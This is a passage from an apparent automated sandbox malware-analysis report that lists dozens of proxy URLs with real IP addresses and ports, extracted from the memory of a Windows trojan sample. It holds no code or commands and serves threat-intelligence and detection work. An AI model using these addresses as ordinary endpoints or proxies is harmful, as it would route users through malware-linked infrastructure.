                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.104:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.140:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.124.93.187:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.124.93.187:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.125:47239
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.125:47239://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.168.178:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.168.178:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.185:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.185:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.133.225:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.133.225:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.136.197.139:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.136.197.139:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.148:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.1808
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.14.174.180:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.189.95:29003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.189.95:29003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.88.219
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.88.219://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.140.88.219:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.30.232:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.30.232:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.129:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.129:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.135.201:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.135.201:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.167.124.30:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.167.124.30:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.170.102.225:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.170.102.225:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.231.197:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.173.231.197:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.87.18:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF3A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.95.38:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.95.38:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.231.210:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.231.210:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.71.90:3180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.71.90:3180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.179.71.90:3180x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.201:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.201:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.73.114:40033
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.73.114:40033://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.73.114:40033x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.236.254:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.236.254:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.3:1994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.3:1994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.48:1994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.48:1994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.164.48:1994://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.166.52:1994
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C75FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.188.166.52:1994://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.117.198:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.117.198:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.248.90:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.248.90:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.8:5432
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.8:5432://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.22.177:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.22.177:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.145:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.145:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.177:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.184.177:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76D4000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.183:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.183:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.186:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.186:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.207.186:999x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.1.1:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.1.1:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.2.1:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.2.1:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6735000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C674C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.227.193.166:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.227.193.166:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.77.131:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.77.131:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.171.41:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.171.41:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.48.131:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.48.131:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.221.193:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.231.221.193:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.170.74:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.170.74:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.3.1:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.3.1:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.2:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAEE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.2:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.16.121:27234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.16.121:27234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.36.19:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.36.19:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9298000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.220.1:8181
